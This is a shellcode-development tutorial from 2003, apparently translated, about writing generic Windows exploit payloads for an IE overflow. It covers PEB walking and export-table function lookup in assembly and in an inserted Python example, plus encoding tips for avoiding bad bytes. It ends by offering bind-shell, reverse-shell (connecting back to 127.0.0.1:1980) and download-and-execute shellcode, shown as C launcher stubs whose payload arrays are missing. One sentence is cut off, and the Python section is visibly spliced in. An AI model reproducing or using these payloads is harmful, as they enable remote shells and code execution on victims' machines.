[Principle] shellcode Writing Technology

Article submission: Jeno (xxgchappy_at_vip.sina.com)

By Jeno
Email: jeno@vip.371.net
Time: 2003-8-31

Title: Shellcode Compiling Technology

While debugging http://www.microsoft.com/technet/security/bulletin/MS03-015.asp some days ago I ran into an annoyance: I had obtained the ability to execute code by overwriting EIP or the SEH handler, but the shellcode currently popular on the Internet could not meet my requirements, mainly in the following respects:
1. It is not general. Usually it only runs on Win2000 and rarely on WinXP or Win2003.
2. Process exit is not handled, so when IE is overflowed, IE ends with an exception.
3. Some code is too long, even exceeding 1000 bytes.
4. It may not work in different language environments.

For the above four reasons, I planned to write a general-purpose shellcode for my own use. In fact, shellcode is not universal, and the most important thing is
After reading the shellcode written by many people, I think most of it is not very good, because most of it uses the method of finding the Kernel32 address in the PEB and then placing the ASCII names of the required functions at the end of the shellcode, finding each function's address by searching memory.
Let me explain why the Kernel32 address can be found through the PEB:
1. FS points to the TEB structure.
2. TEB + 0x30 points to the PEB structure.
3. PEB + 0x0c points to the PEB_LDR_DATA structure.
4. PEB_LDR_DATA + 0x1c is the list of loaded dynamic link libraries (in initialisation order): the first entry is ntdll.dll, and the second entry is the kernel32.dll we need.

The following is the assembly code:
    mov eax, fs:[0x30]        ; eax = PEB
    mov eax, [eax + 0x0c]     ; eax = PEB_LDR_DATA
    mov esi, [eax + 0x1c]     ; esi = first entry of the initialisation-order list (ntdll.dll)
    lodsd                     ; eax = next entry (kernel32.dll)
    mov ebp, [eax + 0x08]     ; ebp = DllBase, the address of kernel32.dll

Generally, the shellcode method for obtaining a function is expressed as follows in assembly:

search_function:
    inc ebx
    cmp [ebx], dl             ; count NUL bytes (function-name boundaries) in ecx
    jne no_zero
    inc ecx
no_zero:
    cmp dword ptr [ebx], 'pteg'
    jne no_match
    cmp dword ptr [ebx + 4], 'ac'
    jne no_match
    je search_complete
no_match:
    jmp search_function

Here EBX (or ESI) is usually initialised to a fixed base address,
for example: db 0ffh, 0ffh, 0e8h, 077h ; specify the kernel base @ 77e60000h
This hard-coded address is the main reason such shellcode is not general-purpose.

To achieve generality we must analyse the PE file format. The following method was obtained through that analysis:
obtain the function address from the PE export directory table (EDT).
1. PE header offset = kernel32.dll base address + 0x3c;
2. Export directory offset = kernel32.dll base address + PE header offset + 120;
3. Export directory table = kernel32.dll base address + export directory offset;
4. Name pointer table = export directory table + 32;
5. Then compare the wanted function name against the names in the name pointer table (either compare the name itself, or compare a hash of the name);
6. Ordinal table = export directory table + 36;
7. The ordinal table leads to the function address, so the function address is found through the ordinal table using the serial number corresponding to the matched name.

Assembly for the search code:
    mov ebp, [somewhere]        ; kernel32.dll base address
    mov eax, [ebp + 0x3c]       ; eax = PE header offset
    mov edx, [ebp + eax + 120]
    add edx, ebp                ; edx = export directory table
    mov ecx, [edx + 24]         ; ecx = number of name pointers
    mov ebx, [edx + 32]
    add ebx, ebp                ; ebx = name pointer table
    dec ecx
    mov esi, [ebx + ecx * 4]
    add esi, ebp                ; esi points to the name selected by ecx (walked downward)
You can search for it by yourself!
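The export lookup described above, written as an added Python example (not code from the original article) that walks a mapped PE32 image with exactly the offsets listed (0x3c, +120, +24, +32, +36) plus the function address table at export directory +28, which the ordinal indexes into. It assumes a mapped image in which RVAs equal offsets from the base (what the shellcode sees in memory; a DLL read from disk would first need its RVAs translated through the section table), and build_image() constructs a minimal synthetic image for testing rather than using a real kernel32.dll.

```python
import struct

# Offsets from the article, in bytes from the given base or table.
E_LFANEW = 0x3C       # DOS header + 0x3c -> offset of the "PE\0\0" header
EXPORT_DIR = 120      # PE header + 120 -> RVA of the export directory (PE32)
NUM_NAMES = 24        # export directory + 24 -> NumberOfNames
ADDR_FUNCS = 28       # export directory + 28 -> RVA of the function address table
ADDR_NAMES = 32       # export directory + 32 -> RVA of the name pointer table
ADDR_ORDS = 36        # export directory + 36 -> RVA of the ordinal table

def u32(img, off):
    return struct.unpack_from("<I", img, off)[0]

def find_export(img, name):
    """Resolve exported `name` (bytes) in a mapped PE32 image the way the
    article's search code does; returns the function RVA, or None."""
    pe = u32(img, E_LFANEW)
    edt = u32(img, pe + EXPORT_DIR)               # export directory table
    names = u32(img, edt + ADDR_NAMES)            # name pointer table
    ords_ = u32(img, edt + ADDR_ORDS)             # ordinal table
    funcs = u32(img, edt + ADDR_FUNCS)            # function address table
    for i in range(u32(img, edt + NUM_NAMES)):    # number of name pointers
        name_rva = u32(img, names + 4 * i)
        if img[name_rva:img.index(b"\0", name_rva)] == name:
            # The ordinal, not i, is the index into the address table.
            ordinal = struct.unpack_from("<H", img, ords_ + 2 * i)[0]
            return u32(img, funcs + 4 * ordinal)
    return None

def build_image(exports):
    """Constructed test fixture (not a real DLL): a flat PE32 layout with
    RVA == offset, carrying only the fields find_export() reads.
    `exports` maps name (bytes) -> function RVA."""
    img = bytearray(0x400)
    pe, edt = 0x80, 0x200
    funcs, names, ords_, strs = 0x240, 0x280, 0x2C0, 0x300
    struct.pack_into("<I", img, E_LFANEW, pe)
    img[pe:pe + 4] = b"PE\0\0"
    struct.pack_into("<I", img, pe + EXPORT_DIR, edt)
    n = len(exports)
    struct.pack_into("<IIII", img, edt + NUM_NAMES, n, funcs, names, ords_)
    for i, (name, rva) in enumerate(exports.items()):
        ordinal = n - 1 - i   # reversed so the ordinal indirection is exercised
        struct.pack_into("<I", img, funcs + 4 * ordinal, rva)
        struct.pack_into("<I", img, names + 4 * i, strs)
        struct.pack_into("<H", img, ords_ + 2 * i, ordinal)
        img[strs:strs + len(name)] = name
        strs += len(name) + 1   # leave the NUL terminator in place
    return bytes(img)
```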

TIPS:
1. When writing network shellcode, it is best to add a WaitForSingleObject call.
2. Do not forget ExitProcess, to avoid many program errors.
3. After the code has been XOR-encoded with 0x99 it must not contain 0x0a, because in the IE overflow 0x0a is converted to 0x0d 0x0a, which will be truncated during the string copy.
That is all for now. I hope it gives you some inspiration!

The following three general shellcodes are provided:

1. bindport 19800

#include <winsock.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")
#define scport 19800
// Don't change the offset
#define port_offset 251

// bindport 19800

int main(int argc, char **argv)
{
    WSADATA wsa;
    unsigned short port;

    WSAStartup(MAKEWORD(2, 2), &wsa);
    // the payload is XOR-encoded with 0x99, so the patched port is pre-encoded too
    port = htons(scport) ^ (u_short)0x9999;
    memcpy(&jeno_bindport19800_sc[port_offset], &port, 2);

    ((void (*)(void))&jeno_bindport19800_sc)();

    return 0;
}

2. Reverse shellcode, default connect back to 127.0.0.1 port 1980

#include <winsock.h>
#include <stdio.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")
#define scip "127.0.0.1"
#define scport 1980
// Don't change the offset
#define ip_offset 201
#define port_offset 208

int main(void)
{
    WSADATA wsa;
    unsigned short port;
    unsigned long ip;

    WSAStartup(MAKEWORD(2, 2), &wsa);
    // port and IP are patched in pre-encoded (XOR 0x99) to match the encoded payload
    port = htons(scport) ^ (u_short)0x9999;
    ip = inet_addr(scip) ^ 0x99999999;
    memcpy(&jeno_connectback_sc[port_offset], &port, 2);
    memcpy(&jeno_connectback_sc[ip_offset], &ip, 4);

    ((void (*)(void))&jeno_connectback_sc)();

    return 0;
}

3. Download & execute shellcode

#include <winsock.h>
#include <stdio.h>


int main(void)
{
    ((void (*)(void))&jeno_downloadfile_sc)();

    return 0;
}

End.
